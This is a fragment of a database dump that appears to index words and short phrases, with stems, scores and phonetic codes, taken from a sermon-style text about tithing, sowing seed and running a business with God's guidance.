(239073, 'of god what', 'of god what', 0, 1, 1.3667, 'O123', 1, '*'),
(239074, 'of god\'s blessing', 'of god blessing', 0, 1, 1.5667, 'O123214252', 1, '*'),
(239075, 'of groundnut', 'of groundnut', 0, 1, 1.4, 'O1265353', 1, '*'),
(239076, 'of groundnut think', 'of groundnut think', 0, 1, 1.6, 'O126535352', 1, '*'),
(239077, 'of income', 'of income', 0, 1, 1.3, 'O1525', 2, '*'),
(239078, 'of income it', 'of income it', 0, 1, 1.4, 'O15253', 1, '*'),
(239079, 'of labor', 'of labor', 0, 1, 1.2667, 'O1416', 1, '*'),
(239080, 'of labor with', 'of labor with', 0, 1, 1.4333, 'O14163', 1, '*'),
(239081, 'of the increase', 'of the increase', 0, 1, 1.5, 'O135262', 1, '*'),
(239082, 'of what your', 'of what your', 0, 1, 1.4, 'O136', 1, '*'),
(239083, 'of your business', 'of your business', 0, 1, 1.5333, 'O161252', 1, '*'),
(239084, 'of your income', 'of your income', 0, 1, 1.4667, 'O16525', 1, '*'),
(239085, 'off', 'off', 0, 0, 0.2, 'O100', 4, '*'),
(239086, 'off seed', 'off seed', 0, 1, 1.2667, 'O123', 1, '*'),
(239087, 'off seed at', 'off seed at', 0, 1, 1.3667, 'O123', 1, '*'),
(239088, 'on a salary', 'on a salary', 0, 1, 1.3667, 'O5246', 1, '*'),
(239089, 'on groundnut', 'on groundnut', 0, 1, 1.4, 'O5265353', 1, '*'),
(239090, 'on groundnut it', 'on groundnut it', 0, 1, 1.5, 'O5265353', 1, '*'),
(239091, 'on the steps', 'on the steps', 0, 1, 1.4, 'O532312', 1, '*'),
(239092, 'one tenth', 'on tenth', 0, 1, 1.3, 'O5353', 1, '*'),
(239093, 'one tenth of', 'on tenth of', 0, 1, 1.4, 'O53531', 1, '*'),
(239094, 'one tenth tenth', 'on tenth tenth', 0, 1, 1.5, 'O535353', 1, '*'),
(239095, 'open yourself', 'open yourself', 0, 1, 1.4333, 'O156241', 1, '*'),
(239096, 'open yourself up', 'open yourself up', 0, 1, 1.5333, 'O156241', 1, '*'),
(239097, 'operate a', 'oper a', 0, 1, 1.3, 'O163', 1, '*'),
(239098, 'operate a divine', 'oper a divine', 0, 1, 1.5333, 'O16315', 1, '*'),
(239099, 'operate in a', 'oper in a', 0, 1, 1.4, 'O1635', 1, '*'),
(239100, 'operate it', 'oper it', 0, 1, 1.3333, 'O163', 1, '*'),
(239101, 'operate it at', 'oper it at', 0, 1, 1.4333, 'O163', 1, '*'),
(239102, 'or a salary', 'or a salary', 0, 1, 1.3667, 'O6246', 1, '*'),
(239103, 'or attacks', 'or attacks', 0, 1, 1.3333, 'O632', 1, '*'),
(239104, 'or attacks don\'t', 'or attacks don', 0, 1, 1.5333, 'O632353', 1, '*'),
(239105, 'or because', 'or because', 0, 1, 1.3333, 'O612', 1, '*'),
(239106, 'or because that', 'or because that', 0, 1, 1.5, 'O6123', 1, '*'),
(239107, 'or give room', 'or give room', 0, 1, 1.4, 'O62165', 1, '*'),
(239108, 'ordinarily', 'ordinarili', 0, 0, 0.6667, 'O63564', 1, '*'),
(239109, 'ordinarily that', 'ordinarili that', 0, 1, 1.5, 'O635643', 1, '*'),
(239110, 'ordinarily that will', 'ordinarili that will', 0, 1, 1.6667, 'O6356434', 1, '*'),
(239111, 'other natural', 'other natural', 0, 1, 1.4333, 'O365364', 1, '*'),
(239112, 'other natural man', 'other natural man', 0, 1, 1.5667, 'O3653645', 1, '*'),
(239113, 'out details', 'out details', 0, 1, 1.3667, 'O342', 1, '*'),
(239114, 'out details about', 'out details about', 0, 1, 1.5667, 'O34213', 1, '*'),
(239115, 'out what are', 'out what are', 0, 1, 1.4, 'O360', 1, '*'),
(239116, 'out what business', 'out what business', 0, 1, 1.5667, 'O31252', 1, '*'),
(239117, 'outcome that', 'outcom that', 0, 1, 1.4, 'O3253', 1, '*'),
(239118, 'outcome that every', 'outcom that every', 0, 1, 1.6, 'O325316', 1, '*'),
(239119, 'outcomes', 'outcom', 0, 0, 0.5333, 'O3252', 1, '*'),
(239120, 'outcomes in', 'outcom in', 0, 1, 1.3667, 'O32525', 1, '*'),
(239121, 'outcomes in the', 'outcom in the', 0, 1, 1.5, 'O325253', 1, '*'),
(239122, 'over the business', 'over the business', 0, 1, 1.5667, 'O1631252', 1, '*'),
(239123, 'own 10', 'own 10', 0, 1, 1.2, 'O500', 1, '*'),
(239124, 'own 10 fulfill', 'own 10 fulfill', 0, 1, 1.4667, 'O51414', 1, '*'),
(239125, 'owner', 'owner', 0, 0, 0.3333, 'O560', 1, '*'),
(239126, 'owner who', 'owner who', 0, 1, 1.3, 'O560', 1, '*'),
(239127, 'owner who draws', 'owner who draws', 0, 1, 1.5, 'O56362', 1, '*'),
(239128, 'particularly', 'particularli', 0, 0, 0.8, 'P632464', 1, '*'),
(239129, 'particularly the', 'particularli the', 0, 1, 1.5333, 'P6324643', 1, '*'),
(239130, 'particularly the first', 'particularli the first', 0, 1, 1.7333, 'P63246431623', 1, '*'),
(239131, 'partner', 'partner', 0, 0, 0.4667, 'P6356', 1, '*'),
(239132, 'partner with', 'partner with', 0, 1, 1.4, 'P63563', 1, '*'),
(239133, 'partner with god', 'partner with god', 0, 1, 1.5333, 'P6356323', 1, '*'),
(239134, 'partner with the', 'partner with the', 0, 1, 1.5333, 'P63563', 1, '*'),
(239135, 'partner your', 'partner your', 0, 1, 1.4, 'P6356', 1, '*'),
(239136, 'partner your business', 'partner your business', 0, 1, 1.7, 'P63561252', 1, '*'),
(239137, 'partnering', 'partner', 0, 0, 0.6667, 'P635652', 1, '*'),
(239138, 'partnering with', 'partner with', 0, 1, 1.5, 'P6356523', 1, '*'),
(239139, 'partnering with the', 'partner with the', 0, 1, 1.6333, 'P6356523', 1, '*'),
(239140, 'pay your', 'pai your', 0, 1, 1.2667, 'P600', 1, '*'),
(239141, 'pay your employees', 'pai your employees', 0, 1, 1.6, 'P65142', 1, '*'),
(239142, 'pay your tithe', 'pai your tithe', 0, 1, 1.4667, 'P630', 1, '*'),
(239143, 'paying', 'pai', 0, 0, 0.4, 'P520', 1, '*'),
(239144, 'paying job', 'pai job', 0, 1, 1.3333, 'P521', 1, '*'),
(239145, 'paying job or', 'pai job or', 0, 1, 1.4333, 'P5216', 1, '*'),
(239146, 'peanut', 'peanut', 0, 0, 0.4, 'P530', 1, '*'),
(239147, 'peanut butter', 'peanut butter', 0, 1, 1.4333, 'P53136', 1, '*'),
(239148, 'peanut butter groundnut', 'peanut butter groundnut', 0, 1, 1.7667, 'P53136265353', 1, '*'),
(239149, 'people something', 'peopl something', 0, 1, 1.5333, 'P425352', 1, '*'),
(239150, 'people something be', 'peopl something be', 0, 1, 1.6333, 'P4253521', 1, '*'),
(239151, 'percentage', 'percentag', 0, 0, 0.6667, 'P62532', 1, '*'),
(239152, 'percentage of', 'percentag of', 0, 1, 1.4333, 'P625321', 1, '*'),
(239153, 'percentage of your', 'percentag of your', 0, 1, 1.6, 'P6253216', 1, '*'),
(239154, 'permutation', 'permut', 0, 0, 0.7333, 'P6535', 1, '*'),
(239155, 'permutation divine', 'permut divine', 0, 1, 1.6, 'P6535315', 1, '*'),
(239156, 'permutation divine names', 'permut divine names', 0, 1, 1.8, 'P65353152', 1, '*'),
(239157, 'pick', 'pick', 0, 0, 0.2667, 'P200', 1, '*'),
(239158, 'pick a', 'pick a', 0, 1, 1.2, 'P200', 1, '*'),
(239159, 'pick a business', 'pick a business', 0, 1, 1.5, 'P21252', 1, '*'),
(239160, 'pick an', 'pick an', 0, 1, 1.2333, 'P250', 1, '*'),
(239161, 'pick an idea', 'pick an idea', 0, 1, 1.4, 'P253', 1, '*'),
(239162, 'place a', 'place a', 0, 1, 1.2333, 'P420', 1, '*'),
(239163, 'place a when', 'place a when', 0, 1, 1.4, 'P425', 1, '*'),
(239164, 'place in abundance', 'place in abundance', 0, 1, 1.6, 'P42515352', 1, '*'),
(239165, 'plan to start', 'plan to start', 0, 1, 1.4333, 'P4532363', 1, '*'),
(239166, 'powered', 'power', 0, 0, 0.4667, 'P630', 1, '*'),
(239167, 'powered from', 'power from', 0, 1, 1.4, 'P63165', 1, '*'),
(239168, 'powered from a', 'power from a', 0, 1, 1.4667, 'P63165', 1, '*'),
(239169, 'prayer and let', 'prayer and let', 0, 1, 1.4667, 'P65343', 1, '*'),
(239170, 'prayer before', 'prayer before', 0, 1, 1.4333, 'P616', 1, '*'),
(239171, 'prayer before you', 'prayer before you', 0, 1, 1.5667, 'P616', 1, '*'),
(239172, 'prayer life conclusion', 'prayer life conclusion', 0, 1, 1.7333, 'P641252425', 1, '*'),
(239173, 'prayerful', 'prayer', 0, 0, 0.6, 'P614', 1, '*'),
(239174, 'prayerful and', 'prayer and', 0, 1, 1.4333, 'P61453', 1, '*'),
(239175, 'prayerful and be', 'prayer and be', 0, 1, 1.5333, 'P614531', 1, '*'),
(239176, 'prayerful more', 'prayer more', 0, 1, 1.4667, 'P61456', 1, '*'),
(239177, 'prayerful more sensitive', 'prayer more sensitive', 0, 1, 1.8, 'P6145625231', 1, '*'),
(239178, 'preparation be', 'prepar be', 0, 1, 1.4667, 'P616351', 1, '*'),
(239179, 'preparation be at', 'prepar be at', 0, 1, 1.5667, 'P6163513', 1, '*'),
(239180, 'preparation birth', 'prepar birth', 0, 1, 1.5667, 'P61635163', 1, '*'),
(239181, 'preparation birth it', 'prepar birth it', 0, 1, 1.6667, 'P61635163', 1, '*'),
(239182, 'prepare well', 'prepar well', 0, 1, 1.4, 'P6164', 1, '*'),
(239183, 'prepare well let', 'prepar well let', 0, 1, 1.5333, 'P61643', 1, '*'),
(239184, 'prepared for d', 'prepar for d', 0, 1, 1.4667, 'P6163163', 1, '*'),
(239185, 'press', 'press', 0, 0, 0.3333, 'P620', 1, '*'),
(239186, 'press further', 'press further', 0, 1, 1.4333, 'P621636', 1, '*'),
(239187, 'press further in', 'press further in', 0, 1, 1.5333, 'P6216365', 1, '*'),
(239188, 'principles', 'principl', 0, 0, 0.6667, 'P652142', 2, '*'),
(239189, 'principles and', 'principl and', 0, 1, 1.4667, 'P65214253', 1, '*'),
(239190, 'principles and kingdom', 'principl and kingdom', 0, 1, 1.7333, 'P6521425325235', 1, '*'),
(239191, 'procedures', 'procedur', 0, 0, 0.6667, 'P62362', 1, '*'),
(239192, 'procedures and', 'procedur and', 0, 1, 1.4667, 'P6236253', 1, '*'),
(239193, 'procedures and processes', 'procedur and processes', 0, 1, 1.8, 'P6236253162', 1, '*'),
(239194, 'processes', 'process', 0, 0, 0.6, 'P620', 1, '*'),
(239195, 'processes that', 'process that', 0, 1, 1.4667, 'P623', 1, '*'),
(239196, 'processes that will', 'process that will', 0, 1, 1.6333, 'P6234', 1, '*'),
(239197, 'promotion c', 'promot c', 0, 1, 1.3667, 'P65352', 1, '*'),
(239198, 'promotion c lt', 'promot c lt', 0, 1, 1.4667, 'P6535243', 1, '*'),
(239199, 'proper son', 'proper son', 0, 1, 1.3333, 'P61625', 1, '*'),
(239200, 'proper son in', 'proper son in', 0, 1, 1.4333, 'P61625', 1, '*'),
(239201, 'proper understanding', 'proper understanding', 0, 1, 1.6667, 'P616536235352', 1, '*'),
(239202, 'proper understanding of', 'proper understanding of', 0, 1, 1.7667, 'P6165362353521', 1, '*'),
(239203, 'proverbs 3', 'proverb 3', 0, 1, 1.3333, 'P61612', 1, '*'),
(239204, 'proverbs 3 9-10', 'proverb 3 9-10', 0, 1, 1.5, 'P61612', 1, '*'),
(239205, 'put yourself on', 'put yourself on', 0, 1, 1.5, 'P362415', 1, '*'),
(239206, 'putting groundnut', 'put groundnut', 0, 1, 1.5667, 'P35265353', 1, '*'),
(239207, 'putting groundnut in', 'put groundnut in', 0, 1, 1.6667, 'P352653535', 1, '*'),
(239208, 'quarter 6', 'quarter 6', 0, 1, 1.3, 'Q636', 1, '*'),
(239209, 'quarter 6 partner', 'quarter 6 partner', 0, 1, 1.5667, 'Q63616356', 1, '*'),
(239210, 'rather wait', 'rather wait', 0, 1, 1.3667, 'R363', 1, '*'),
(239211, 'rather wait upon', 'rather wait upon', 0, 1, 1.5333, 'R36315', 1, '*'),
(239212, 'realm of abundance', 'realm of abundance', 0, 1, 1.6, 'R4515352', 1, '*'),
(239213, 'rebuked for', 'rebuk for', 0, 1, 1.3667, 'R12316', 1, '*'),
(239214, 'rebuked for your', 'rebuk for your', 0, 1, 1.5333, 'R12316', 1, '*'),
(239215, 'receive impartation', 'receiv impartation', 0, 1, 1.6333, 'R2151635', 1, '*'),
(239216, 'receive impartation for', 'receiv impartation for', 0, 1, 1.7667, 'R215163516', 1, '*'),
(239217, 'regular it', 'regular it', 0, 1, 1.3333, 'R2463', 1, '*'),
(239218, 'regular it could', 'regular it could', 0, 1, 1.5333, 'R2463243', 1, '*'),
(239219, 'regularly and', 'regularli and', 0, 1, 1.4333, 'R246453', 1, '*'),
(239220, 'regularly and particularly', 'regularli and particularly', 0, 1, 1.8667, 'R2464531632464', 1, '*'),
(239221, 'regularly by', 'regularli by', 0, 1, 1.4, 'R24641', 1, '*'),
(239222, 'regularly by sowing', 'regularli by sowing', 0, 1, 1.6333, 'R24641252', 1, '*'),
(239223, 'righteousness follow', 'righteous follow', 0, 1, 1.6667, 'R2325214', 1, '*'),
(239224, 'righteousness follow all', 'righteous follow all', 0, 1, 1.8, 'R2325214', 1, '*'),
(239225, 'ripple', 'rippl', 0, 0, 0.4, 'R140', 1, '*'),
(239226, 'ripple of', 'rippl of', 0, 1, 1.3, 'R141', 1, '*'),
(239227, 'ripple of divine', 'rippl of divine', 0, 1, 1.5333, 'R141315', 1, '*'),
(239228, 'room for', 'room for', 0, 1, 1.2667, 'R516', 1, '*'),
(239229, 'room for occultic', 'room for occultic', 0, 1, 1.5667, 'R5162432', 1, '*'),
(239230, 'room for the', 'room for the', 0, 1, 1.4, 'R5163', 1, '*'),
(239231, 'run your', 'run your', 0, 1, 1.2667, 'R560', 1, '*'),
(239232, 'run your business', 'run your business', 0, 1, 1.5667, 'R561252', 1, '*'),
(239233, 'sake nothing', 'sake nothing', 0, 1, 1.4, 'S5352', 1, '*'),
(239234, 'sake nothing can', 'sake nothing can', 0, 1, 1.5333, 'S53525', 1, '*'),
(239235, 'salary job', 'salari job', 0, 1, 1.3333, 'S4621', 1, '*'),
(239236, 'salary job you', 'salari job you', 0, 1, 1.4667, 'S4621', 1, '*'),
(239237, 'salary scale', 'salari scale', 0, 1, 1.4, 'S4624', 1, '*'),
(239238, 'salary scale in', 'salari scale in', 0, 1, 1.5, 'S46245', 1, '*'),
(239239, 'say and', 'sai and', 0, 1, 1.2333, 'S530', 1, '*'),
(239240, 'say and you', 'sai and you', 0, 1, 1.3667, 'S530', 1, '*'),
(239241, 'scale in', 'scale in', 0, 1, 1.2667, 'S450', 1, '*'),
(239242, 'scale in your', 'scale in your', 0, 1, 1.4333, 'S456', 1, '*'),
(239243, 'scope', 'scope', 0, 0, 0.3333, 'S100', 1, '*'),
(239244, 'scope and', 'scope and', 0, 1, 1.3, 'S153', 1, '*'),
(239245, 'scope and directs', 'scope and directs', 0, 1, 1.5667, 'S1536232', 1, '*'),
(239246, 'scope of', 'scope of', 0, 1, 1.2667, 'S100', 1, '*'),
(239247, 'scope of your', 'scope of your', 0, 1, 1.4333, 'S160', 1, '*'),
(239248, 'scriptural ground', 'scriptur ground', 0, 1, 1.5667, 'S613642653', 1, '*'),
(239249, 'scriptural ground that', 'scriptur ground that', 0, 1, 1.7333, 'S613642653', 1, '*'),
(239250, 'scripturally', 'scriptur', 0, 0, 0.8, 'S61364', 1, '*'),
(239251, 'scripturally that', 'scriptur that', 0, 1, 1.5667, 'S613643', 1, '*'),
(239252, 'scripturally that will', 'scriptur that will', 0, 1, 1.7333, 'S6136434', 1, '*'),
(239253, 'searching', 'search', 0, 0, 0.6, 'S6252', 1, '*'),
(239254, 'searching for', 'search for', 0, 1, 1.4333, 'S625216', 1, '*'),
(239255, 'searching for information', 'search for information', 0, 1, 1.8333, 'S625216516535', 1, '*'),
(239256, 'secure', 'secur', 0, 0, 0.4, 'S600', 1, '*'),
(239257, 'secure the', 'secur the', 0, 1, 1.3333, 'S630', 1, '*'),
(239258, 'secure the future', 'secur the future', 0, 1, 1.5667, 'S63136', 1, '*'),
(239259, 'secures', 'secur', 0, 0, 0.4667, 'S620', 1, '*'),
(239260, 'secures your', 'secur your', 0, 1, 1.4, 'S626', 1, '*'),
(239261, 'secures your place', 'secur your place', 0, 1, 1.6, 'S626142', 1, '*'),
(239262, 'seed at', 'seed at', 0, 1, 1.2333, 'S300', 1, '*'),
(239263, 'seed at the', 'seed at the', 0, 1, 1.3667, 'S300', 1, '*'),
(239264, 'seed is', 'seed is', 0, 1, 1.2333, 'S320', 1, '*'),
(239265, 'seed is 350', 'seed is 350', 0, 1, 1.3667, 'S320', 1, '*'),
(239266, 'seed this', 'seed this', 0, 1, 1.3, 'S320', 1, '*'),
(239267, 'seed this is', 'seed this is', 0, 1, 1.4, 'S320', 1, '*'),
(239268, 'seed will', 'seed will', 0, 1, 1.3, 'S340', 1, '*'),
(239269, 'seed will connect', 'seed will connect', 0, 1, 1.5667, 'S342523', 1, '*'),
(239270, 'seed you', 'seed you', 0, 1, 1.2667, 'S300', 1, '*'),
(239271, 'seed you sow', 'seed you sow', 0, 1, 1.4, 'S320', 1, '*'),
(239272, 'seeds there', 'seed there', 0, 1, 1.3667, 'S3236', 1, '*'),
(239273, 'seeds there are', 'seed there are', 0, 1, 1.5, 'S3236', 1, '*'),
(239274, 'sensitive', 'sensit', 0, 0, 0.6, 'S5231', 3, '*'),
(239275, 'sensitive and', 'sensit and', 0, 1, 1.4333, 'S523153', 1, '*'),
(239276, 'sensitive and stronger', 'sensit and stronger', 0, 1, 1.7333, 'S523153236526', 1, '*'),
(239277, 'separate yourself', 'separ yourself', 0, 1, 1.5667, 'S1636241', 1, '*'),
(239278, 'separate yourself from', 'separ yourself from', 0, 1, 1.7333, 'S163624165', 1, '*'),
(239279, 'set aside', 'set aside', 0, 1, 1.3, 'S323', 1, '*'),
(239280, 'set aside to', 'set aside to', 0, 1, 1.4, 'S323', 1, '*'),
(239281, 'should begin', 'should begin', 0, 1, 1.4, 'S43125', 1, '*'),
(239282, 'should begin to', 'should begin to', 0, 1, 1.5, 'S431253', 1, '*'),
(239283, 'should find', 'should find', 0, 1, 1.3667, 'S43153', 1, '*'),
(239284, 'should find out', 'should find out', 0, 1, 1.5, 'S43153', 1, '*'),
(239285, 'should start', 'should start', 0, 1, 1.4, 'S432363', 1, '*'),
(239286, 'should start with', 'should start with', 0, 1, 1.5667, 'S432363', 1, '*'),
(239287, 'so that the', 'so that the', 0, 1, 1.3667, 'S300', 2, '*'),
(239288, 'something be', 'someth be', 0, 1, 1.4, 'S53521', 1, '*'),
(239289, 'something be sure', 'someth be sure', 0, 1, 1.5667, 'S5352126', 1, '*'),
(239290, 'sometimes failures', 'sometim failures', 0, 1, 1.6, 'S53521462', 1, '*'),
(239291, 'sometimes failures but', 'sometim failures but', 0, 1, 1.7333, 'S5352146213', 1, '*'),
(239292, 'son in', 'son in', 0, 1, 1.2, 'S500', 1, '*'),
(239293, 'son in the', 'son in the', 0, 1, 1.3333, 'S530', 1, '*'),
(239294, 'sow a', 'sow a', 0, 1, 1.1667, 'S000', 1, '*'),
(239295, 'sow a commensurate', 'sow a commensurate', 0, 1, 1.6, 'S5263', 1, '*'),
(239296, 'sow commensurate', 'sow commensurate', 0, 1, 1.5333, 'S5263', 1, '*'),
(239297, 'sow commensurate to', 'sow commensurate to', 0, 1, 1.6333, 'S5263', 1, '*'),
(239298, 'sow give', 'sow give', 0, 1, 1.2667, 'S100', 1, '*'),
(239299, 'sow give to', 'sow give to', 0, 1, 1.3667, 'S130', 1, '*'),
(239300, 'sow your seed', 'sow your seed', 0, 1, 1.4333, 'S623', 1, '*'),
(239301, 'sowing seeds', 'sow seeds', 0, 1, 1.4, 'S5232', 1, '*'),
(239302, 'sowing seeds there', 'sow seeds there', 0, 1, 1.6, 'S523236', 1, '*'),
(239303, 'sowing your', 'sow your', 0, 1, 1.3667, 'S526', 1, '*'),
(239304, 'sowing your seed', 'sow your seed', 0, 1, 1.5333, 'S52623', 1, '*'),
(239305, 'spare in', 'spare in', 0, 1, 1.2667, 'S165', 1, '*'),
(239306, 'spare in searching', 'spare in searching', 0, 1, 1.6, 'S16526252', 1, '*'),
(239307, 'spirit bring', 'spirit bring', 0, 1, 1.4, 'S1631652', 1, '*'),
(239308, 'spirit bring instructions', 'spirit bring instructions', 0, 1, 1.8333, 'S163165252362352', 1, '*'),
(239309, 'spiritual life because', 'spiritu life because', 0, 1, 1.7333, 'S163412', 1, '*'),
(239310, 'spiritual preparation', 'spiritu preparation', 0, 1, 1.7, 'S1634161635', 1, '*'),
(239311, 'spiritual preparation birth', 'spiritu preparation birth', 0, 1, 1.9, 'S1634161635163', 1, '*'),
(239312, 'spread and', 'spread and', 0, 1, 1.3333, 'S16353', 1, '*'),
(239313, 'spread and wholesales', 'spread and wholesales', 0, 1, 1.7, 'S163534242', 1, '*'),
(239314, 'staff', 'staff', 0, 0, 0.3333, 'S310', 1, '*'),
(239315, 'staff put', 'staff put', 0, 1, 1.3, 'S313', 1, '*'),
(239316, 'staff put yourself', 'staff put yourself', 0, 1, 1.6, 'S3136241', 1, '*'),
(239317, 'standards and', 'standard and', 0, 1, 1.4333, 'S35363253', 1, '*'),
(239318, 'standards and begin', 'standard and begin', 0, 1, 1.6333, 'S35363253125', 1, '*'),
(239319, 'standing upon', 'stand upon', 0, 1, 1.4333, 'S3535215', 1, '*'),
(239320, 'standing upon don\'t', 'stand upon don', 0, 1, 1.6333, 'S3535215353', 1, '*'),
(239321, 'start a business', 'start a business', 0, 1, 1.5333, 'S3631252', 1, '*'),
(239322, 'start a transport', 'start a transport', 0, 1, 1.5667, 'S363652163', 1, '*'),
(239323, 'start and', 'start and', 0, 1, 1.3, 'S36353', 1, '*'),
(239324, 'start and do', 'start and do', 0, 1, 1.4, 'S36353', 1, '*'),
(239325, 'start is', 'start is', 0, 1, 1.2667, 'S3632', 1, '*'),
(239326, 'start is always', 'start is always', 0, 1, 1.5, 'S363242', 1, '*'),
(239327, 'start putting groundnut', 'start putting groundnut', 0, 1, 1.7667, 'S363135265353', 1, '*'),
(239328, 'start telling', 'start telling', 0, 1, 1.4333, 'S363452', 1, '*'),
(239329, 'start telling people', 'start telling people', 0, 1, 1.6667, 'S36345214', 1, '*'),
(239330, 'start with', 'start with', 0, 1, 1.3333, 'S363', 1, '*'),
(239331, 'start with spiritual', 'start with spiritual', 0, 1, 1.6667, 'S36321634', 1, '*'),
(239332, 'starting seed', 'start seed', 0, 1, 1.4333, 'S363523', 1, '*'),
(239333, 'starting seed is', 'start seed is', 0, 1, 1.5333, 'S3635232', 1, '*'),
(239334, 'steps press', 'step press', 0, 1, 1.3667, 'S312162', 1, '*'),
(239335, 'steps press further', 'step press further', 0, 1, 1.6333, 'S3121621636', 1, '*'),
(239336, 'steps that', 'step that', 0, 1, 1.3333, 'S3123', 1, '*'),
(239337, 'steps that will', 'step that will', 0, 1, 1.5, 'S31234', 1, '*'),
(239338, 'steps to take', 'step to take', 0, 1, 1.4333, 'S31232', 1, '*'),
(239339, 'streams', 'stream', 0, 0, 0.4667, 'S3652', 1, '*'),
(239340, 'streams of', 'stream of', 0, 1, 1.3333, 'S36521', 1, '*'),
(239341, 'streams of income', 'stream of income', 0, 1, 1.5667, 'S36521525', 1, '*'),
(239342, 'stronger you', 'stronger you', 0, 1, 1.4, 'S36526', 1, '*'),
(239343, 'stronger you cannot', 'stronger you cannot', 0, 1, 1.6333, 'S36526253', 1, '*'),
(239344, 'such that you', 'such that you', 0, 1, 1.4333, 'S300', 1, '*'),
(239345, 'supply', 'suppli', 0, 0, 0.4, 'S140', 1, '*'),
(239346, 'supply of', 'suppli of', 0, 1, 1.3, 'S141', 1, '*'),
(239347, 'supply of all', 'suppli of all', 0, 1, 1.4333, 'S1414', 1, '*'),
(239348, 'sure it', 'sure it', 0, 1, 1.2333, 'S630', 1, '*'),
(239349, 'sure it is', 'sure it is', 0, 1, 1.3333, 'S632', 1, '*'),
(239350, 'sure you', 'sure you', 0, 1, 1.2667, 'S600', 1, '*'),
(239351, 'sure you are', 'sure you are', 0, 1, 1.4, 'S600', 1, '*'),
(239352, 'sure you do', 'sure you do', 0, 1, 1.3667, 'S630', 1, '*'),
(239353, 'system sowing', 'system sowing', 0, 1, 1.4333, 'S35252', 1, '*'),
(239354, 'system sowing your', 'system sowing your', 0, 1, 1.6, 'S352526', 1, '*'),
(239355, 'take also', 'take also', 0, 1, 1.3, 'T242', 1, '*'),
(239356, 'take also press', 'take also press', 0, 1, 1.5, 'T242162', 1, '*'),
(239357, 'take lightly', 'take lightly', 0, 1, 1.4, 'T24234', 1, '*'),
(239358, 'take lightly your', 'take lightly your', 0, 1, 1.5667, 'T242346', 1, '*'),
(239359, 'take off', 'take off', 0, 1, 1.2667, 'T210', 1, '*'),
(239360, 'take off seed', 'take off seed', 0, 1, 1.4333, 'T2123', 1, '*'),
(239361, 'take the anointing', 'take the anointing', 0, 1, 1.6, 'T235352', 1, '*'),
(239362, 'take you away', 'take you away', 0, 1, 1.4333, 'T200', 1, '*'),
(239363, 'telling people', 'tell people', 0, 1, 1.4667, 'T45214', 1, '*'),
(239364, 'telling people something', 'tell people something', 0, 1, 1.8, 'T4521425352', 1, '*'),
(239365, 'tenth', 'tenth', 0, 0, 0.3333, 'T530', 1, '*'),
(239366, 'tenth of', 'tenth of', 0, 1, 1.2667, 'T531', 1, '*'),
(239367, 'tenth of your', 'tenth of your', 0, 1, 1.4333, 'T5316', 1, '*'),
(239368, 'tenth tenth', 'tenth tenth', 0, 1, 1.3667, 'T5353', 1, '*'),
(239369, 'tenth tenth of', 'tenth tenth of', 0, 1, 1.4667, 'T53531', 1, '*'),
(239370, 'text proverbs', 'text proverbs', 0, 1, 1.4333, 'T23161612', 1, '*'),
(239371, 'text proverbs 3', 'text proverbs 3', 0, 1, 1.5, 'T23161612', 1, '*'),
(239372, 'that are due', 'that are due', 0, 1, 1.4, 'T630', 1, '*'),
(239373, 'that business', 'that business', 0, 1, 1.4333, 'T1252', 1, '*'),
(239374, 'that business do', 'that business do', 0, 1, 1.5333, 'T12523', 1, '*'),
(239375, 'that devourer', 'that devourer', 0, 1, 1.4333, 'T160', 1, '*'),
(239376, 'that devourer is', 'that devourer is', 0, 1, 1.5333, 'T162', 1, '*'),
(239377, 'that every other', 'that every other', 0, 1, 1.5333, 'T1636', 1, '*'),
(239378, 'that is available', 'that is available', 0, 1, 1.5667, 'T21414', 2, '*'),
(239379, 'that the anointing', 'that the anointing', 0, 1, 1.6, 'T5352', 1, '*'),
(239380, 'that will connect', 'that will connect', 0, 1, 1.5667, 'T42523', 1, '*'),
(239381, 'that will lead', 'that will lead', 0, 1, 1.4667, 'T430', 1, '*'),
(239382, 'that will legitimize', 'that will legitimize', 0, 1, 1.6667, 'T42352', 1, '*'),
(239383, 'that you always', 'that you always', 0, 1, 1.5, 'T420', 1, '*'),
(239384, 'that you have', 'that you have', 0, 1, 1.4333, 'T100', 4, '*'),
(239385, 'that you open', 'that you open', 0, 1, 1.4333, 'T150', 1, '*'),
(239386, 'that you sow', 'that you sow', 0, 1, 1.4, 'T200', 1, '*'),
(239387, 'the abundance that', 'the abundance that', 0, 1, 1.6, 'T153523', 1, '*'),
(239388, 'the anointing along', 'the anointing along', 0, 1, 1.6333, 'T5352452', 1, '*'),
(239389, 'the anointing and', 'the anointing and', 0, 1, 1.5667, 'T535253', 1, '*'),
(239390, 'the anointing will', 'the anointing will', 0, 1, 1.6, 'T53524', 1, '*'),
(239391, 'the blessings', 'the blessings', 0, 1, 1.4333, 'T14252', 1, '*'),
(239392, 'the blessings of', 'the blessings of', 0, 1, 1.5333, 'T142521', 1, '*'),
(239393, 'the business', 'the business', 0, 1, 1.4, 'T1252', 1, '*'),
(239394, 'the business 3', 'the business 3', 0, 1, 1.4667, 'T1252', 1, '*'),
(239395, 'the business grows', 'the business grows', 0, 1, 1.6, 'T125262', 1, '*'),
(239396, 'the business make', 'the business make', 0, 1, 1.5667, 'T125252', 1, '*'),
(239397, 'the business regularly', 'the business regularly', 0, 1, 1.7333, 'T125262464', 1, '*'),
(239398, 'the common', 'the common', 0, 1, 1.3333, 'T250', 1, '*'),
(239399, 'the common outcome', 'the common outcome', 0, 1, 1.6, 'T25325', 1, '*'),
(239400, 'the covenant that', 'the covenant that', 0, 1, 1.5667, 'T2153', 1, '*'),
(239401, 'the details', 'the details', 0, 1, 1.3667, 'T420', 1, '*'),
(239402, 'the details c', 'the details c', 0, 1, 1.4333, 'T420', 1, '*'),
(239403, 'the direction', 'the direction', 0, 1, 1.4333, 'T6235', 2, '*'),
(239404, 'the direction of', 'the direction of', 0, 1, 1.5333, 'T62351', 2, '*'),
(239405, 'the expanse', 'the expanse', 0, 1, 1.3667, 'T2152', 1, '*'),
(239406, 'the expanse and', 'the expanse and', 0, 1, 1.5, 'T215253', 1, '*'),
(239407, 'the expression', 'the expression', 0, 1, 1.4667, 'T21625', 1, '*'),
(239408, 'the expression of', 'the expression of', 0, 1, 1.5667, 'T216251', 1, '*'),
(239409, 'the first fruit', 'the first fruit', 0, 1, 1.5, 'T1623163', 1, '*'),
(239410, 'the first one', 'the first one', 0, 1, 1.4333, 'T16235', 1, '*'),
(239411, 'the following steps', 'the following steps', 0, 1, 1.6333, 'T1452312', 1, '*'),
(239412, 'the force of', 'the force of', 0, 1, 1.4, 'T1621', 1, '*'),
(239413, 'the future give', 'the future give', 0, 1, 1.5, 'T13621', 1, '*'),
